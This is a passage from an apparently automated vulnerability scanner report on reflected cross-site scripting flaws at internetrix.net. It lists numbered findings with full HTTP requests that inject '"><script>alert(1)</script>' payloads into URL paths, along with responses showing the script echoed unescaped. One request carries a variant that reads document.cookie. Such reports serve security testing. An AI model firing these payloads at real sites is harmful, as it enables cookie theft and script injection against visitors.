Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.6.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:24:54 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - actionbe0c7"><script>alert(1)</script>c3045ca88cd/event_signup/1066">
...[SNIP]...
1.118. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ac5e2"><script>alert(1)</script>d100cc1e7c7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /captchaac5e2"><script>alert(1)</script>d100cc1e7c7/77ebd8dc1911e2a888fa4585da1fe3e3.png HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:43 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30300


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - captchaac5e2"><script>alert(1)</script>d100cc1e7c7/77ebd8dc1911e2a888fa4585da1fe3e3.png">
...[SNIP]...
1.119. http://www.internetrix.net/captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /captcha/77ebd8dc1911e2a888fa4585da1fe3e3.png

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0e37"><script>alert(1)</script>9a58bced905 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /captcha/77ebd8dc1911e2a888fa4585da1fe3e3.pngd0e37"><script>alert(1)</script>9a58bced905 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:50 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30342


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - captcha/77ebd8dc1911e2a888fa4585da1fe3e3.pngd0e37"><script>alert(1)</script>9a58bced905">
...[SNIP]...
1.120. http://www.internetrix.net/cgi-bin/ajax/utm_vars.cgi [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /cgi-bin/ajax/utm_vars.cgi

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fdfd"><script>alert(1)</script>22f25afd9d1e57476 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /cgi-bin9fdfd"><script>alert(1)</script>22f25afd9d1e57476/ajax/utm_vars.cgi?action=get_utm_variables&object_type=page&object_id=960&utm_params_applied=0&HTTP_ACCEPT_LANGUAGE=&REMOTE_ADDR=&HTTP_REFERER=&HTTP_USER_AGENT=&screen_width=1920&screen_height=1200&screen_depth=16&window_width=1079&window_height=1038&java_enabled=1&flash_vers=10.2.154 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
Origin: http://www.internetrix.net
X-Prototype-Version: 1.6.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.0.10.1302308294; __utmc=173809275; __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:33 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30256


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - cgi-bin9fdfd"><script>alert(1)</script>22f25afd9d1e57476/ajax/utm_vars.cgi">
...[SNIP]...
1.121. http://www.internetrix.net/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 528f3"><script>alert(1)</script>476275b45cb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico528f3"><script>alert(1)</script>476275b45cb HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.1.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:18 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30193


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - favicon.ico528f3"><script>alert(1)</script>476275b45cb">
...[SNIP]...
1.122. http://www.internetrix.net/flash/video.swf [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /flash/video.swf

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe4e5"><script>alert(1)</script>b4521d281d6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flashfe4e5"><script>alert(1)</script>b4521d281d6/video.swf HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.0.10.1302308294; __utmc=173809275; __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:39 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30282


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - flashfe4e5"><script>alert(1)</script>b4521d281d6/video.swf">
...[SNIP]...
1.123. http://www.internetrix.net/flash/video.swf [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /flash/video.swf

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5d5b6"><script>alert(1)</script>e5d06c4b308 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /flash/video.swf5d5b6"><script>alert(1)</script>e5d06c4b308 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.0.10.1302308294; __utmc=173809275; __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:19:46 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30237


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - flash/video.swf5d5b6"><script>alert(1)</script>e5d06c4b308">
...[SNIP]...
1.124. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /freestyle/optimizer

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9af0"><script>alert(1)</script>2c6e5ad129d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /freestylec9af0"><script>alert(1)</script>2c6e5ad129d/optimizer HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:18:41 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - freestylec9af0"><script>alert(1)</script>2c6e5ad129d/optimizer">
...[SNIP]...
1.125. http://www.internetrix.net/freestyle/optimizer [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /freestyle/optimizer

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0633"><script>alert(1)</script>c221bb42d42 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /freestyle/optimizerf0633"><script>alert(1)</script>c221bb42d42 HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:18:49 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30263


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - freestyle/optimizerf0633"><script>alert(1)</script>c221bb42d42">
...[SNIP]...
1.126. http://www.internetrix.net/general.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /general.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1c3f"><script>alert(1)</script>c379c8587fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /general.cssa1c3f"><script>alert(1)</script>c379c8587fa HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/accreditations/dbcde-panel-member/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.4.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:23:59 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30234


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - general.cssa1c3f"><script>alert(1)</script>c379c8587fa">
...[SNIP]...
1.127. http://www.internetrix.net/optimizer.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /optimizer.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a124a"><script>alert(1)</script>ef5e119e82d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /optimizer.htmla124a"><script>alert(1)</script>ef5e119e82d HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:18:35 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - optimizer.htmla124a"><script>alert(1)</script>ef5e119e82d">
...[SNIP]...
1.128. http://www.internetrix.net/page/accreditations/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/accreditations/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26036"><script>alert(1)</script>e39a76957d8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page26036"><script>alert(1)</script>e39a76957d8/accreditations/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:59 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30203


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page26036"><script>alert(1)</script>e39a76957d8/accreditations">
...[SNIP]...
1.129. http://www.internetrix.net/page/accreditations/dbcde-panel-member/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/accreditations/dbcde-panel-member/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b35d5"><script>alert(1)</script>635a3313a6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pageb35d5"><script>alert(1)</script>635a3313a6/accreditations/dbcde-panel-member/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/accreditations/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.4.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:23:55 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30299


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pageb35d5"><script>alert(1)</script>635a3313a6/accreditations/dbcde-panel-member">
...[SNIP]...
1.130. http://www.internetrix.net/page/articles/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4291"><script>alert(1)</script>bf8317b02a5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagec4291"><script>alert(1)</script>bf8317b02a5/articles/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/contact-us/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmb=173809275.2.10.1302308294; __utmc=173809275

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:21:49 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30191


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pagec4291"><script>alert(1)</script>bf8317b02a5/articles">
...[SNIP]...
1.131. http://www.internetrix.net/page/articles/latest-news/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/latest-news/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bac3a"><script>alert(1)</script>4ec4125112c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagebac3a"><script>alert(1)</script>4ec4125112c/articles/latest-news/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.8.10.1302308294; fontsize=100

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:25:37 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30244


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - pagebac3a"><script>alert(1)</script>4ec4125112c/articles/latest-news">
...[SNIP]...
1.132. http://www.internetrix.net/page/articles/newsletters/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/articles/newsletters/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3db9e"><script>alert(1)</script>e472d9060e6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /page3db9e"><script>alert(1)</script>e472d9060e6/articles/newsletters/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/page/articles/latest-news/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=173809275.1302308294.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); fontsize=100; __utma=173809275.1985559550.1302308294.1302308294.1302308294.1; __utmc=173809275; __utmb=173809275.9.10.1302308294

Response

HTTP/1.1 404
Date: Sat, 09 Apr 2011 00:25:58 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 30275


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv=
...[SNIP]...
<input type="hidden" name="product" value="Sorry, we didn't find - page3db9e"><script>alert(1)</script>e472d9060e6/articles/newsletters">
...[SNIP]...
1.133. http://www.internetrix.net/page/contact-us/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.internetrix.net
Path:   /page/contact-us/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3392"><script>alert(1)</script>03fc8cb16ef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagec3392"><script>alert(1)</script>03fc8cb16ef/contact-us/ HTTP/1.1
Host: www.internetrix.net
Proxy-Connection: keep-alive
Referer: http://www.internetrix.net/optimizer.htmla124a%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eef5e119e82d
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
